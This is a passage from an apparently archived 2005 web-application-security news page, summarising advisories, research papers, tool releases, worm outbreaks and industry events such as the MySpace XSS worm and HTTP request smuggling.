Hosting generously provided by
|
|
12/31/05 Trojan Horse Program Targetting Adsense
|
Apparently people are uploading malware to users computers in order to modify ads displayed on websites they visit with their own ad.
"Techshout.com reports that a new, deceptive Trojan Horse program has surfaced. The program is engineered to produce fake Google ads that
are formatted to look like legitimate ones. The ads are incorporated in Google AdSense, the program that lets website owners display ads from Google's
list of advertisers. The Trojan Horse apparently downloads itself onto an unsuspecting computer through a web page and then replaces the original ads
with its own set of malicious ads." - TechShout
Full Article Link:
Link to this Story:
Link:
|
|
|
|
12/31/2005 Application Security Predictions For The Year 2006
|
In 2005 published application security vulnerabilities have exploded. If you're subscribed to mailing lists such as bugtraq you know
just how often , SQL Injection, or
Remote Command Execution vulnerabilities are discovered and exploited. I've prepared a prediction outline for the year 2006 exclusively covering
the threats that the web brings.
Worms and Browser Vulnerabilities
2005 brought the first web application worm (not web server) and a couple of spin offs. Of course the trend will continue although I suspect
2006 will bring more criminal aspects. Currently the only web application worms (that we've seen) attach to irc servers and
seem to belong to some 'hacking/script kid' groups.
The year 2005 has also brought a 'TON' of browser based vulnerabilities in most browsers including Netscape, Internet Explorer,
FireFox, and more. A mix of web application, and browser based worms probably will begin in 2006. Some of you remember the Nimda
worm and since then a worm exploiting a server/client hasn't been identified. Frankly I'm surprised we haven't seen any since but
with the recent interest in browser based vulnerabilities I suspect this idea is going to catch on, and not just with hacking groups
but also organized crime. The potential here is endless (See Prediction #2 for an example of what I'm talking about).
Phishing and Cross Site Scripting
has become more widespread with no slowdown in
sight. In 2005 multiple presentations including one by
at Blackhat, and another by
outlined the combination of phishing and cross site scripting. These talks touched on the ability by an attacker to use known exploits
in a browser to have interactive sessions with the attacker, as well as perform backend network scanning/exploitation via the XMLHTTP AJAX
functionality that most browsers support. For years Cross Site Scripting has been a 'joke' to many people in the security industry. With new
uses for cross site scripting being found everyday I see the potential for XSS exploding, including being included as a payload for future worms
(traditional, and web based) to help execute phishing attacks.
Web Application Backdooring
Millions of web applications process billions of dollars per year in transactions. Understanding how these applications work is fairly trivial since a
large majority of them are off the shelf open source, or fairly cheap. We've seen people in the past install trojans, and rootkits to help gain
control over a users system in order to steal data including credit cards, social security numbers, game keys ;) etc... We've also seen breaches at large
financial organizations were data was being stolen via website vulnerabilities such as . Something we haven't heard much about is web application
backdooring. This happens when an attacker exploits a vulnerable web server, and modifies an existing web application to perform new duties, or copy
transaction information. For years people have been tracking application integrity with applications such as tripwire to see if an application has been
modified although this isn't practical in a large percentage of situations were a website is going through constant changes.
RSS Feeds
Just like any application you must ensure that the data that you're processing is properly sanitized. I suspect that we'll be seeing wide scale abuse
of RSS feeds in the near future. Having done some research on this myself (which I hope to publish soon) 2006 is going to be a very interesting year.
Conclusions
The Web Application Security space isn't dying any time soon :)
Link to this Story:
Link:
|
|
|
|
12/28/2005 More than 450 Phishing Attacks Used SSL in 2005
|
Netcraft has published some statistics about phishing on their site.
"In its first year, the Netcraft Toolbar Community has identified more than 450 confirmed phishing URLs using "https" urls to present a secure connection using the Secure Sockets Layer (SSL). The number of phishing attacks using SSL is significant for several reasons. Anti-phishing education initiatives have often urged Internet users to look for the SSL "golden lock" as an indicator of a site's legitimacy. Although phishers have been using SSL in attacks for more than a year, the trend seems to have drawn relatively little notice from users and the technology press.
Case in point: The use of SSL certificates in phishing scams made headlines in September when a security vendor issued a press release warning of a scam in which a spoofed phishing site used a self-signed certificate, presenting a gold lock icon but also triggering a browser warning that the certificate was not recognized. In this case, the phishers were banking on the likelihood that many users will trust the padlock and ignore the certificate warning. Despite the attention, the attack wasn't particularly new or novel." - Netcraft
Article Link
Link to this Story:
Link:
|
|
|
|
12/27/2005 Security Vendors Form Application Security Industry Consortium (AppSIC)
|
Apparently Microsoft, Oracle, Red Hat, and SAP have formed a vendor based security consortium titled "AppSIC" or
the Application Security Industry Consortium. Quoting the article
"Herbert Thompson, the consortium's chair and director of security technology at Security Innovation, says AppSIC members will
meet monthly to exchange ideas and vet papers to be issued under the AppSIC imprimatur.
"For instance, we'll publish the top 10 questions I'd need to ask my vendor on software security before I buy and the kinds of
answers you should expect," Thompson says. "And we're going to help enterprises factor in security in their budgets, as well as
help I.T. development groups increase software security." - CIO Today
News Link:
APPSIC Website Link
Link to this Story:
Link:
|
|
|
|
12/25/2005 Yahoo Cross Site Scripting Vulnerability Discovered
|
A posting to the Full Disclosure mailing list claims an unpatched in Yahoo!'s mail
with example script code. Quoting the author
"i didnt contact yahoo, because i contacted them previously regarding a
similar vulnerability, and yes they fixed it "silently" without even
sending me a thank you email, frankly i didnt really appreciate that."
Oh and Happy Holidays.
Mailing List Post Link:
Link to this Story:
Link:
|
|
|
|
12/23/2005 PAPER: Preventing Http Session Fixation Attacks
|
Zinho Writes "I've published the final research about Http Session Fixation covering the most known attacks and how to prevent them. The paper
is written from a web developer point of view and shows various techniques to be safe from fixation and hijacking."
Paper Link:
Link to this Story:
Link:
|
|
|
|
12/21/2005 Top 7 PHP Security Blunders
|
Sitepoint has published an article covering the 7 most common vulnerability types applied to the PHP language as well as
configuration options to futher lock down your environment. While I disagree with the structure/actual 7 the article is good
and worth checking out.
If you're lazy and just want the seven here it is. (I'm such a nice guy)
* Unvalidated Input Errors
* Access Control Flaws
* Session ID Predication
* Cross Site Scripting
* SQL Insertion
* Error Reporting
* Data Handling Errors
Article Link:
Link to this Story:
Link:
|
|
|
|
12/20/2005 "2005 The Year of Phishing"
|
Phishing has exploded in 2005 so I've decided to dedicate a section of this site towards it. I have created a Phishing
resource page providing a list of tools, news articles, whitepapers, and solutions to phishing. If there is a resource
that I've missed please .
Phishing Link:
Link to this Story:
Link:
|
|
|
|
12/14/2005 Countering Trusting Trust through Diverse Double-Compiling
|
"An Air Force evaluation of Multics, and Ken Thompson's famous Turing award lecture "Reflections on Trusting Trust," showed that compilers can be subverted to insert malicious Trojan horses into critical software, including themselves. If this attack goes undetected, even complete analysis of a system's source code will not find the malicious code that is running, and methods for detecting this particular attack are not widely known. This paper describes a practical technique, termed diverse double-compiling (DDC), that detects this attack and some unintended compiler defects as well. Simply recompile the purported source code twice: once with a second (trusted) compiler, and again using the result of the first compilation. If the result is bit-for-bit identical with the untrusted binary, then the source code accurately represents the binary. This technique has been mentioned informally, but its issues and ramifications have not been identified or discussed in a peer-reviewed work, nor has a public demonstration been made. This paper describes the technique, justifies it, describes how to overcome practical challenges, and demonstrates it." - David Wheeler
Paper Link
Link:
|
|
|
|
12/07/2005 Critical Myspace Vulnerabilities Leave Every Active Account Exploitable
|
A paper by Justin Lavoie titled "Critical Myspace Vulnerabilities Leave Every Active Account Exploitable" describes
a vulnerability in myspace.com's IM WebApplication.
"In this advisory we will be detailing some very recent holes in the Myspace.com web-application. If you are not
familiar with Myspace there is much information about the internet phenomenon on the web that will do better
justice at describing what it is than I can here. Both vulnerabilities lie within the Instant Message (IM) feature
from within the site. Proper manipulation of both exploits leaves every active account on Myspace potential targets. " - Justin
Advisory Link:
Link:
|
|
|
|
11/30/2005 RSS Is Worm Bots Next Target
|
Yahoo news has an interesting article on worm propigation via rss feeds.
"David Sancho, senior anti-virus research engineer at Trend Micro, warned that RSS feed hijacking will become
commonplace when Microsoft Corp. ships Internet Explorer 7, a browser refresh that will feature built-in RSS support.
In a white paper titled "The Future of Bot Worms," Sancho said the IE7 release "will open some interesting possibilities to worm creators." - Yahoo!
A whitepaper by Trend-Micro describes the concept more in detail.
News Link:
Download The Paper:
Link:
|
|
|
|
11/29/2005 OWASP vs WASC
|
CMP Media has written a nice comparison chart between WASC (an organization I co founded :) and OWASP. While I may
not agree with everything in this article, it does clearly outline a few key points between the two organizations.
However I *don't* agree with the following:
"Two organizations promise to help. The Open Web Application Security Project (OWASP) mainly targets software developers and the
application architects who manage them, aiming to stamp out security bugs in the applications themselves. The Web Application
Security Consortium (WASC) is broader, focusing on threat classification and all means of mitigation.
The two are sometimes seen as rivals because they were founded by competing penetration-testing firms and take different
approaches to security. But for most enterprises, both approaches are necessary: OWASP can help harden applications, while
WASC can help ensure that any remaining vulnerabilities aren't exploited. All their code and documentation is freely available
for in-house use, so there's no reason not to select the best of both worlds." - CMP
<Start of Rant>
Now some people involved in WASC can be considered 'competition' (OWASP I'm sure has a few people competing against each other as
well, which is normal) but I don't consider us rivals. I'd also like to clear up that the organization was founded by myself,
and a good friend of mine (who yes, works at a :). While I do work for a security vendor, WASC was not created *soley*
by vendors for the purpose of vendor interests. The purpose of WASC is to promote proper security practices regardless of the
department you're in (IT Manager, QA/Tester , Developer, Architect, Penetration Tester, etc...) through education via our
. The GIF linked below also mentions
that WASC doesn't release 'code'. At this time we have no immediate plans to release any code, but it isn't entirely
ruled out (it is entirely depandant on a specific project's need).
<End of Rant>
Article Link:
Image Chart Link:
Link:
|
|
|
|
11/15/2005 ModSecurity 1.9 FINAL has been released
|
Ivan Ristic Writes "ModSecurity 1.9 FINAL has been released. It is available for immediate download from:
After more than a year in development, ModSecurity 1.9 introduces a number of changes that further increase usefulness of
this web application security tool.
Changes (since 1.8)
-------------------
Major enhancements include:
* A brand new audit logging subsystem aimed at supporting real time aggregation of the forensic logs. It is now possible
to fine-tune forensic logging and even log complete responses.
* Significant rule engine enhancements that increase flexibility, introduce meta-data facilities, and allow for safe inclu
sion of third-party produced rule databases.
* A new stateful request monitoring mechanism, which includes tools for defence against Denial of Service attacks.
* Many smaller improvements throughout, including: performance measurement, ten new actions, seventeen new variables, outp
ut status filtering, performance improvements, support for methods other than GET and POST, ClamAV integration, and so on.
For a list with more details please visit:
"
Link:
|
|
|
|
11/7/2005 PHP Worm in the Wild
|
"Virus writers have created a Linux worm which uses a recently discovered
in XML-RPC for PHP, a popular open source component used in many applications, to attack vulnerable systems." - The Register
Article Link
Link:
|
|
|
|
10/31/2005 PHP 4.4.1. Released
|
PHP 4.4.1 has been released to address multiple security vulnerabilities. From the announcements page
"This is a bug fix release, which addresses some security problems too. The security issues that this release fixes are:
* Fixed a Cross Site Scripting (XSS) vulnerability in phpinfo() that could lead f.e. to cookie exposure, when a phpinfo() script is accidently left on a production server.
* Fixed multiple safe_mode/open_basedir bypass vulnerabilities in ext/curl and ext/gd that could lead to exposure of files normally not accessible due to safe_mode or open_basedir restrictions.
* Fixed a possible $GLOBALS overwrite problem in file upload handling, extract() and import_request_variables() that could lead to unexpected security holes in scripts assumed secure. (For more information, see here).
* Fixed a problem when a request was terminated due to memory_limit constraints during certain parse_str() calls. In some cases this can result in register_globals being turned on.
* Fixed an issue with trailing slashes in allowed basedirs. They were ignored by open_basedir checks, so that specified basedirs were handled as prefixes and not as full directory names.
* Fixed an issue with calling virtual() on Apache 2. This allowed bypassing of certain configuration directives like safe_mode or open_basedir.
* Updated to the latest pcrelib to fix a possible integer overflow vulnerability announced in CAN-2005-2491.
"
Full PHP Announcement:
PHP Changelog:
PHP Download Page:
Link:
|
|
|
|
10/18/2005 Apache 1.3.34 Released!
|
Per the apache mailing list
"
Apache HTTP Server 1.3.34 Released
The Apache Software Foundation and The Apache HTTP Server Project are
pleased to announce the release of version 1.3.34 of the Apache HTTP
Server ("Apache"). This Announcement notes the significant changes
in 1.3.34 as compared to 1.3.33. This Announcement1.3 document may
also be available in multiple languages at:
This version of Apache is principally a bug and security fix release.
A partial summary of the bug fixes is given at the end of this document.
A full listing of changes can be found in the CHANGES file. Of
particular note is that 1.3.34 addresses and fixes 2 potential
security issues:
o If a request contains both Transfer-Encoding and
Content-Length headers, remove the Content-Length, mitigating some
HTTP Request Splitting/Spoofing attacks.
* Added TraceEnable [on|off|extended] per-server directive to alter
the behavior of the TRACE method.
We consider Apache 1.3.34 to be the best version of Apache 1.3
available and we strongly recommend that users of older versions,
especially of the 1.1.x and 1.2.x family, upgrade as soon as possible. No further
releases will be made in the 1.2.x family.
Apache 1.3.34 is available for download from:
" - Apache
Link:
|
|
|
|
10/13/2005 Cross-Site Scripting Worm Hits MySpace
|
A cgisecurity reader writes "One clever MySpace user looking to expand his buddy list recently figured out how to force others to become his friend, a
nd ended up creating the first self-propagating cross-site scripting (XSS) worm. In less than 24 hours, "Samy" had amassed
over 1 million friends on the popular online community."
Article Link:
Link:
|
|
|
|
10/12/2005 The Cross-site Scripting Virus
|
Wade Alcorn has written an academic paper outlining the use of as a vector
to launch viruses with that is certainly worth the read. I'm glad to see new uses for existing issues
most consider minor. 2005 has certainly been an interesting year for expanding XSS based attacks.
Article
Link:
|
|
|
|
10/10/2005 Google fixes Web site security bug
|
"Who Cares" writes "Google has fixed a security flaw on its Web site that opened the door to phishing scams, account
hijacks and other attacks, security researchers said Monday."
Story Link:
Link:
|
|
|
|
10/08/2005 Web Hacking "Directory Traversal" Conviction
|
As a warning to those of you 'poking' around suspicious websites an English man was convicted for executing
a directory traversal attack against a suspicious site. I find a conviction for sending 2 web requests to be
rather disturbing. Sadly these types of convictions will probably happen more and more often.
"Cuthbert is accused of attempting a directory traversal attack on the donate.bt.com site which handles credit card payments on behalf of the Disasters Emergency Committee.
Giving evidence on his own behalf, Cuthbert, at times near tears, said he had made a £30 donation to the site, after
clicking on a banner advert. Because he received no final thank-you or confirmation page he became concerned it may have
been a phishing site, so he carried out two tests to check the security of the site." - The Register
"During the trial, Cuthbert's defence argued that any unauthorised access was entirely innocent. In evidence it was shown that he had attempted to access the tsunami donations site on two occasions and the site's security systems had denied him access.
The defence also pointed out that Cuthbert had not attempted to defraud the site. Security expert Peter Sommer is concerned by the conviction.
"Nobody thought he was doing anything significant or malicious, and there was a strong argument that the police should have given him a slap on the wrists and not prosecuted,” said Sommer, senior research fellow at the London School of Economics’ Information Systems Integrity Group." - ZDnet
The Register Link:
The Register Link:
ZDNet Link:
Link:
|
|
|
|
10/08/2005 Web Application Firewall Evaluation Criteria Document Released
|
has released a
document entitled "Web Application Firewall Evaluation Criteria".
"The goal of this project is to develop a detailed web application firewall evaluation criteria; a testing methodology
that can be used by any reasonably skilled technician to independently assess the quality of a WAF solution. Furthermore,
we want to limit the complexity of the criteria to have the evaluation process (of a single product) last two hours or
less. " -
This project is lead by Ivan Ristic the author of the popular open source application firewall
Article Link:
Link:
|
|
|
|
09/24/2005 Exploiting the XmlHttpRequest object in IE - Referrer spoofing, and a lot more By Amit Klein
|
"XmlHttpRequest is a Javascript object that allows a client side Javascript code to send almost raw HTTP requests to the origin host and to access the response's body in raw form. As such, XmlHttpRequest is a core component of AJAX.
It seems that the same origin security policy ensures that the power of XmlHttpRequest is only used in a secure manner (after all, if the Javascript code can only access the server it originated from, then what harm can be done, except for XSS conditions), but this is not so. In fact, about 2.5 years ago I noticed a problem in XmlHttpRequest's implementation in IE - IE doesn't validate some critical fields that are provided by the user [1]. Back at that time, the attack vector was through an XSS condition, but the basic flaw (and other, related flaws) renders itself nicely to other conditions, which we'll see below." - Amit Klein
Article Link:
Link:
|
|
|
|
09/21/2005 Phishing Filter in IE7
|
Microsoft is including a 'Phishing Filter' in IE7 that automatically checks sites against a known list of 'bad sites'
and prompts the user with a warning. You can read more about this at Microsofts IE blog (Screenshots included!).
Phising Filter Link:
Link:
|
|
|
|
09/21/2005 IE7 Security in Brief
|
Microsoft's IE blog has an interesting peek at some of the new security features that IE7 will bring.
"We heard people ask for more separation between the browser and Windows. In IE7, we built a containment wall around IE by running it in Protected Mode. In this mode, IE can browse the web but cannot install software (good or bad) or change settings on the user’s computer without explicit user consent. Because the foundation work to make this possible is in Windows Vista, this feature is not available on the XP version of IE7. Expect to read more about the details of how this works, and how IE balances compatibility (e.g. users still want their toolbars to work!) with security, in another post.
We heard people say that ActiveX controls had too much privilege. In IE7, we made sure that the only ActiveX controls available to IE were the ones intended for use on the internet. Microsoft Windows includes many, many ActiveX controls. For example, an application developer can use IE technology to browse the web inside her application by using a particular ActiveX. While only some ActiveX controls were intended for use inside IE by web sites, many of them identify themselves as available for use inside IE. We decided that allowing ActiveX controls to run in IE should be the exception, not the rule. IE7 will block all ActiveX controls from running in the browser except for controls that were explicitly intended for the browser. That list is under the user’s control. Of course, to keep mainstream web sites running, the most commonly used, clearly intended for the web, ActiveX controls (like Flash) will be on that list by default." - Microsoft
Blog Link:
Link:
|
|
|
|
09/20/2005 Worm spoofs Google on infected PCs
|
"P2Load-A modifies the HOSTS file on infected PCs by replacing the original with a file downloaded from a remote website under the control of hackers. When users run a search, the results are normally shown correctly - but sponsored links are different. For some searches, other links appear which have been specified by the creator of this malware, resulting in increased traffic to these websites.
The changes in behaviour happen because users are not getting their results from Google but from a hacker-controlled website based in Germany. P2Load-A also modifies a user's start page. Spanish anti-virus firm Panda reports the page is an almost exact copy of Google, which supports the 17 languages of Google and redirects users even if they make a mistake when entering the address, such as 'wwwgoogle.com'.
"Its [P2Load's] aims are none other than to increase visits to the pages linked by the creator of this malware or earn an income from companies that want to appear in the first few results in computer where the identity of Google has been spoofed," said Luis Corrons, director of PandaLabs. "In both cases, the motivation of the author of this malware is purely financial." " - The Register
Story Link:
Link:
|
|
|
|
09/16/2005 Privacy Vulnerabilities in Encrypted HTTP Stream
|
"Encrypting traffic does not prevent an attacker from per- forming some types of traffic analysis. We present a
straight forward traffic analysis attack against encrypted HTTP streams that is surprisingly effective in identifying
the source of the traffic. An attacker starts by creating a profile of the statistical characteristics of web requests
from interesting sites, including distributions of packet sizes and inter-arrival times."
Link:
Link:
|
|
|
|
09/14/2005 CGISecurity.com Celebrates its 5th birthday
|
This site started out as a hobby where after the first year it averaged about 100 Unique visitors per
month. Years later we now receive well over ten times the amount of visitors per day and are growingly
steadily. Today celebrates its
5th birthday making it the oldest (and still vendor nuetral! :) site dedicated soley to Web Application Security
(Yes even older then OWASP). To celebrate I've added a section dedicated to
(Non Commercial).
If you know of any decent (Non company sponsored) articles (surprisingly hard to find) on web application firewall
methodology, shortcomings, or real world usage please .
I'm also announcing a link partnership program where you can get your site on our links page, as well as rotate
in our sponsored link box on the right in exchange for linking to us (On topic security sites only!).
if you wish to learn more
about our partnership programs.
You can also subscribe to our
to get scrolling news in your browser or website. are also available.
For those of you that irc and would like to chat feel free to stop by #webappsec on irc.freenode.net
(). If irc isn't your thing check out
run by (An organization I in 2004).
Link:
Link:
Link:
Link:
|
|
|
|
09/09/05 My Interview with Astalavista.com
|
I was recently interviewed for the
newsletter. That is all.
Interview Link:
Link:
|
|
|
|
08/29/2005 Preventing Log Evasion in IIS
|
The Web Application Security Consortium has released a new article titled 'Preventing Log Evasion in IIS'.
This paper describes a problem in IIS which allows an attacker to evade certain logging functionality as well
as how to fix it.
Link:
Link:
|
|
|
|
08/15/2005 (IN)SECURE Magazine Issue 3 released
|
Mirko Zorz writes
"The third issue of (IN)SECURE, a free digital security magazine published in PDF format, has been
released.
The covered topics are:
- The reality of SQL injection
- Security vulnerabilities, exploits and patches
- PDA attacks: palm sized devices - PC sized threats
- Adding service signatures to Nmap
- CSO and CISO - perception vs. reality in the security kingdom
- Unified threat management: IT security's silver bullet?
- 12 months of progress for the Microsoft Security Response Centre
- Interview with Michal Zalewski, security researcher
- OpenSSH for Macintosh
- Method for forensic validation of backup tapes
The magazine can be downloaded from .
Link:
|
|
|
|
08/14/2005 Paros 3.2.4 released
|
"Paros 3.2.4 is released. This is a maintenance release with essential bug fixes and some user suggested enhancement. We recommend all users perform upgrade. In the meantime we are looking into
other user suggestions as well.
The new verison is available at ." - Parosproxy.org
Link:
|
|
|
|
08/14/2005 Worm in the Wild exploiting MS05-039
|
A worm has been discovered exploiting the recent Plug and Play exploit in the wild.
"A worm started spreading on Sunday using a flaw in the Windows operating system's Plug-and-Play functionality, according to two security groups, who advised users to update systems using a patch released by Microsoft five days ago."
The worm, dubbed Zotob by antivirus firm F-Secure, started spreading early Sunday morning, according to a statement posted by the company. The security firm did not post any additional information about the extent of the digital epidemic, however.
F-Secure's researchers do not believe that the worm will widely infect computer systems.
"Zotob is not going to become another Sasser," F-Secure's researchers said on the virus lab's blog. The worm does not infect computers running Windows XP Service Pack 2 nor Windows 2003, as those systems are somewhat protected against the Windows Plug-and-Play vulnerability. Machines that block port 445 using a firewall will also not be vulnerable, the company said. "As a result, the majority of Windows boxes on the Net won't be hit by (the worm)," the blog stated. " - Securityfocus
Additional
information can be found at the links below.
SecurityFocus:
Microsoft Security Bulletin MS05-039:
Internet Storm Center:
F-Secure Blog:
Slashdot:
Link:
|
|
|
|
08/05/2005 Burp Proxy 1.3 Released
|
"Burp proxy v1.3beta is now available at
Burp proxy is an interactive HTTP/S proxy server for attacking
and debugging web-enabled applications. It operates as a
man-in-the-middle between the end browser and the target Web
server, and allows the user to intercept, inspect, and modify
the raw traffic passing in both directions." - PortSwigger
Link:
Link:
|
|
|
|
07/25/2005 The Web Application Security Consortium Blackhat meetup
|
The Web Application Security Consortium is having a get together this week during the blackhat conference which
anyone can attend (I'll be there).
"An opportunity to meet other webappsec people to share drinks, appetizers, and interesting conversation in a fun atmosphere. Over three dozen people on the attendee list, which will be our biggest meet-up to date. Its going to be great time and I look forward to seeing everyone there!"
Place: at Cesaer's
Time: Wed, July 27 @ 6:00pm (Wander down after the final Day 1 talks)
Link:
|
|
|
|
07/20/2005 Six Unpatched Flaws in Oracle Database Products
|
"A German database security outfit on Tuesday went public with information on six unpatched vulnerabilities—some rated critical—in Oracle Forms and Oracle Reports, two widely deployed enterprise-facing products.
Red-Database-Security GmbH, a company that specializes in Oracle security audits, warned that the most serious flaw could allow a malicious hacker to use a Web browser to overwrite any file on a vulnerable application server." - EWEEK
""Oracle's behavior not fixing critical security bugs for a long time is not acceptable for their customers," Kornbrust said, warning that long delays in releasing patches "put their customers in danger."
"At least one of these vulnerabilities can be abused from any attacker on the Internet," he added." - EWEEK
Article:
Link:
|
|
|
|
07/18/2005 Flaws in Proxy NTLM HTTP Authentication?
|
Amit Klein has released a paper describing the risks of proxies that share a TCP connection with a host
using NTLM Authentication.
"In connection oriented security, the authentication is associated with the TCP connection, rather than to the individual HTTP requests it transports. As a result, a proxy server that shares a TCP connection to the server among 2 clients may jeopardize the security of the web application by sending a first request (or a set of requests) with authentication/authorization credentials from the first client, followed by a request with no credentials from the second client, and have the web server associate the privileges of the first request with the second request.
"
Article:
Link:
|
|
|
|
07/11/2005 DOM Based Cross Site Scripting or XSS of the Third Kind
|
"Amit Klein has released an article focusing on a little known variant of Cross Site Scripting which
attacks a user's client without sending malicious content to the web server. "
Article:
Link:
|
|
|
|
07/09/2005 SQL Injection in USC exposes applicant data
|
"A programming error in the University of Southern California's online system for accepting applications from prospective students left the personal information of as many as 320,000 users publicly accessible, school officials confirmed on Tuesday."
"The vulnerability in USC's online Web application system is a relatively common and well-known software bug, known as database injection or SQL injection. A lack of security checks on user input allows a hostile user to submit a database command rather than a log-in name. The command could cause the database to send its information back to the attacker or aid the attacker in compromising the computer system hosting the database."
Article Link:
Link:
|
|
|
|
07/05/2005 New Version of Jumperz Open Source Web Application Firewall Released
|
Kanatoko Writes
" jumperz_net_076.jar is released.
available at
A new plugin "HRSDetector" is added.
This plugin detects and prevents HRS( HTTP Request Smuggling ) attack.
For more details, see the following URL.
And, rule "GID2" is updated to call this plugin.
Don't forget to update your rule file."
Link:
|
|
|
|
06/27/2005 Kavado is no more
|
"Kavado is shutting because there's no market for stand-alone firewalls, industry sources say.
June 24, 2005
The Israeli data security company Kavado is folding; proof, industry experts say, that there is no
market for stand-alone firewalls.
This week, Kavado laid off 20 of its 35 workers at its Rosh Ha'Ayin offices. The only job left for
those who remain is to sell off the company's assets and lock up, industry sources said." - Red Herring
Kavado was an application security company offering a Web Application Assessment Tool (ScanDo), and
Application firewall product (InterDo).
Article:
Link:
|
|
|
|
06/21/2005 Common Security Problems in the Code of Dynamic Web Applications
|
Sverre H. Huseby has released a new paper on the .
"In the last few years an increasing number of web programmers have started realizing that the
code they write for a living plays a major part in the overall security of a web site. Even
though the administrators install state of the art firewalls, keep off-the-shelf software
patched and protect communication with heavy encryption, there are many ways to attack the
logic of the custom-made application code itself.
There is seemingly an infinite number of different logical glitches that may lead to exploitable
security problems in a web application. But even though the number of glitches may be infinite,
many of the most frequently occurring glitches may be put in one of the following, rather limited
set of categories:
* Failure to deal with metacharacters of a subsystem
* Authorization problems due to giving too much trust in input
That's only two categories, and they cover much of the web application security hype published
in the last eight years or so." - Sverre
Article Link:
Link:
|
|
|
|
06/13/2005 Paros 3.2.2 released
|
An anonymous user writes
"This version features command line spider, scanning and report generation, export to text file, HTTP state
tracking with cookies and an improved spider.
It is available from
Link:
|
|
|
|
06/12/2005 Book Review: "Apache Security"
|
I've just completed my review on "Apache Security" by O'Reilly.
"This book was written by Ivan Ristic, the author of the popular Apache web
application firewall module mod_security. Naturally this book does discuss how to
use mod_security to harden your system, but I'm happy to report it isn't his main
area of focus. One of the first things that I do while reviewing a book is to find
all the things that the text doesn't cover that it *really* should have and point
them out in my review. Simply put this book has everything, and I do mean everything.
Here's the low down on a per chapter basis."
Read the entire review:
Link:
Link:
|
|
|
|
06/11/2005 "Meanwhile, on the other side of the web server"
|
Amit sent a little writeup on the problems that can existing in both client and server side
HTTP Parsing routines to
.
"The major claim of this write-up is that we should start looking at the communication between
the web server and the client. Specifically, we should take a good hard look at the HTTP-aware
entities that process the HTTP requests and responses passing to and fro between the client and
the server. " - Amit
Link:
|
|
|
|
06/07/2005 Whitepaper: HTTP Request Smuggling
|
Ory Segal Writes
"We describe a new web entity attack technique HTTP Request Smuggling. The attack technique and the derived
attacks are relevant to most web environments and is the result of a HTTP server or devices failure to properly
handle malformed inbound HTTP requests. HTTP Request Smuggling works by taking advantage of the discrepancies in
parsing when one or more HTTP devices/entities (e.g. Cache Server, Proxy Server, Web Application Firewall, etc.)
are in the data flow between the user and the web server. HTTP Request Smuggling enables various attacks web cache
poisoning, session hijacking, cross-site scripting and most serious the ability to bypass web application firewall
protection. HTTP Request Smuggling sends multiple specially-crafted HTTP requests that cause the two attacked entities
to see two different sets of requests, allowing the hacker to smuggle a request to one device without the other
device being aware of it. In the Web Cache poisoning attack, this smuggled request will trick the cache server into
unintendedly associating a URL to another URLs page (content), and caching this content for the URL. In the Web
Application Firewall attack the smuggled request could be a worm (like Nimda or Code Red) or buffer overflow attack
targeting the web server. Finally, because HTTP Request Smuggling enables the attacker to insert or sneak a request
into the flow it allows the attacker to manipulate the web servers request/response sequencing which can allow for
credential hijacking and other malicious outcomes."
Download Link:
Link:
|
|
|
|
06/06/2005 Multiple Web Services tools released
|
An anonymous user writes "
wsPawn - Web services footprinting, discovery, search & domain footprinting tools. If you are looking
for registered web services and their access points, this tool will help you in retrieving information
from public UDDI.
wsKnight - Web services profiling, proxy and audit tool. This tool helps in profiling web services from
its WSDL. It also allows you to invoke methods and intercept them before they go on the wire to the
target, so that you can manipulate the SOAP envelope if needed. The autoaudit feature allows you to
inject characters and attack strings for assessment work.
wsRook - This is a very simple technology demonstration for developers. This is a regular
expression-based defense for web services input content. This is a hook in HTTP pipe using the
HttpModule interface.
Whitepapers are included for better understanding for all these tools. "
Download
Link:
|
|
|
|
05/26/2005 Nikto 1.35 Available
|
Sullo Writes "Nikto 1.35 is now available for download. This release includes patches from
Pavel Kankovsky to support multiple config files and to reduce false positives. It also includes
updated databases and several bug fixes.
All users are encouraged to upgrade to the latest version.
Download Link:
Link:
|
|
|
|
05/24/2005 AJAX (Asynchronous Javascript and XML) Security Section Added
|
With the strong interest in AJAX I felt it was time to dedicate a section of the website to it
located at .
If you feel a certain link is missing please
Link:
|
|
|
|
05/21/2005 Domain Footprinting for Web Applications and Web Security
|
"A wide array of services, from banking and finance transactions to auctions and ticket reservations, are being offer
ed to customers online. This means that an Internet presence for companies may encompass several domains for each of
the different services being offered online.
Performing web application or web services assessment with zero level knowledge for clients can be a daunting task
for the web analyst. It is important to locate and footprint all critical domains running web applications or web s
ervices.
Web applications are crawled by all popular search engines. Domains running web applications or web services may hav
e some links that may have been cached and archived by these search engines. This considerably simplifies our task.
In this paper, we demonstrate how advanced search options offered by search engines like Google, A9, Yahoo, Alexa an
d others can be leveraged to obtain critical information about domains.
"
Story Link:
Link:
|
|
|
|
05/07/2005 SQL Server Service Pack 4 released
|
Microsoft has released SQl Server 2000 Service Pack 4!
Additional Information:
Link:
Link:
|
|
|
|
05/07/2005 SQL Server 2005 Security Article
|
"It's an increasingly hostile world for your databases and client applications. Every day, attackers
develop clever new attacks to compromise your valuable data. Fortunately, SQL Server™ 2005 offers
strong new security features that directly address principles such as defense in depth and least
privilege. As explained in SQL Server Books Online, Microsoft has implemented a number of security
initiatives, which include reducing the attack surface area and making it easier to securely deploy
SQL Server and databases, while providing better security tools and docs about maintaining high
security in a changing security landscape." - MSDN
Article Link:
Link:
|
|
|
|
05/07/2005 Announcement "The Web Security Mailing List"
|
I'm proud to be the first to announce a new mailing list whos creation I was a part of entitled
"The Web Security Mailing List". Additional information can be found at the charter link below.
To post a message send an email to: websecurity@webappsec.org
Subscribe by sending email to: websecurity-subscribe@webappsec.org
Unsubscribe by sending email to: websecurity-unsubscribe@webappsec.org
Charter:
Web Archives:
Link:
|
|
|
|
05/04/2005 Incompatible Parameter Parsing
|
Sverre H. Huseby has an interesting paper on his site regarding the handling
of parameter parsing worth checking out.
Link:
|
|
|
|
04/30/2005 Trojan attack exploits Google typos
|
Just stumbled upon this at theregister.
"Hackers have set up malicious websites designed to infect the Windows boxes of surfers who mistype the name of popular search engine Google.com. If a user opens one of the malicious websites, such as googkle.com1, his PC box may be hijacked with malware including Trojan downloaders, backdoors and spyware." - TheReg
Article Link:
Link:
|
|
|
|
04/29/2005 Stopping Automated Attack Tools
|
Gunter Ollmann releases yet another interesting paper that gets you thinking.
"Paper Abstract:
An almost infinite array of automated tools exist to spider and mirror
application content, extract confidential material, brute force guess
authentication credentials, discover code-injection flaws, fuzz application
variables for exploitable overflows, scan for common files or vulnerable
CGI's, and generally attack or exploit web-based application flaws. While
